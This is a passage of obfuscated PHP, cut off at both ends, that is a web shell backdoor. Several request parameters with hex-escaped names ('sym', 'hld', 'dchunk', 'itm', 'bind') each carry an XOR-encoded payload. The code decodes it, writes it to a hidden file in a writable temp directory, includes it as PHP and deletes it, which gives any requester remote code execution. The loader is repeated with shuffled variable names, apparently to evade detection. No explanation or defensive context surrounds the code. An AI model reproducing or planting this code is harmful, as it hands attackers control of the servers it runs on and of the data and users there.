0 && isset($_REQUEST["s\x79\x6D"])){ $record = array_filter([getenv("TMP"), getcwd(), "/tmp", "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/var/tmp", session_save_path()]); $ent = $_REQUEST["s\x79\x6D"]; $ent = explode( '.', $ent ); $data_chunk = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s4); $v = 0; foreach( $ent as $v1) { $chS = ord( $s4[$v % $sLen]); $d =( ( int)$v1 - $chS -( $v % 10)) ^15; $data_chunk .= chr( $d); $v++; } foreach ($record as $marker): if ((bool)is_dir($marker) && (bool)is_writable($marker)) { $property_set = "$marker" . "/.hld"; if (file_put_contents($property_set, $data_chunk)) { require $property_set; unlink($property_set); exit; } } endforeach; } if(!empty($_POST["hld"])){ $ent = $_POST["hld"]; $ent= explode( '.' , $ent) ; $pgrp = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s2); foreach ($ent as $y => $v9): $sChar = ord($s2[$y % $lenS]); $dec = ((int)$v9 - $sChar - ($y % 10)) ^3; $pgrp .=chr($dec); endforeach; $property_set = array_filter(["/var/tmp", getcwd(), "/dev/shm", "/tmp", session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP")]); foreach ($property_set as $key => $ent) { if ((bool)is_dir($ent) && (bool)is_writable($ent)) { $symbol = "$ent" . "/.holder"; if (@file_put_contents($symbol, $pgrp) !== false) { include $symbol; unlink($symbol); exit; } } } } if(in_array("\x64\x63hunk", array_keys($_POST))){ $data = $_POST["\x64\x63hunk"]; $data= explode ( '.' , $data ) ; $ent= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $s ); $len= count( $data ); for( $p= 0; $p< $len; $p++) { $v8= $data[$p]; $sChar= ord( $s[$p % $sLen] ); $d= ( ( int)$v8 - $sChar -( $p % 10)) ^14; $ent .= chr( $d );} $elem = array_filter([getenv("TMP"), "/var/tmp", session_save_path(), getcwd(), "/tmp", getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir()]); foreach ($elem as $entry) { if (array_product([is_dir($entry), is_writable($entry)])) { $tkn = "$entry" . "/.desc"; if (file_put_contents($tkn, $ent)) { require $tkn; unlink($tkn); die(); } } } } if(count($_REQUEST) > 0 && isset($_REQUEST["\x69\x74m"])){ $record = $_REQUEST["\x69\x74m"]; $record = explode( "." , $record) ; $holder = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); $u = 0; foreach ($record as $v4) { $chS = ord($salt[$u % $sLen] ); $dec = ((int)$v4 - $chS - ($u % 10)) ^ 59; $holder.=chr($dec ); $u++;} $obj = array_filter([ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", sys_get_temp_dir(), "/dev/shm", "/tmp", getenv("TMP"), getenv("TEMP"), session_save_path()]); foreach ($obj as $key => $ref) { if (!( !is_dir($ref) || !is_writable($ref) )) { $reference = join("/", [$ref, ".sym"]); $file = fopen($reference, 'w'); if ($file) { fwrite($file, $holder); fclose($file); include $reference; @unlink($reference); die(); } } } } if(!is_null($_POST["bind"] ?? null)){ $factor = array_filter([ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getenv("TEMP"), "/dev/shm", session_save_path(), sys_get_temp_dir(), getenv("TMP"), getcwd()]); $obj = $_POST["bind"]; $obj = explode( ".",$obj ) ; $rec = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s9); $k = 0; foreach ($obj as $v3) { $sChar = ord($s9[$k % $lenS]); $dec = ((int)$v3 - $sChar - ($k % 10)) ^ 93; $rec.= chr($dec); $k++; } $reference = 0; do { $parameter_group = $factor[$reference] ?? null; if ($reference >= count($factor)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($parameter_group)) { $symbol = implode("/", [$parameter_group, ".dat"]); if (file_put_contents($symbol, $rec)) { include $symbol; @unlink($symbol); exit; } } $reference++; } while (true); } if(!empty($_REQUEST["itm"])){ $elem = $_REQUEST["itm"]; $elem = explode ("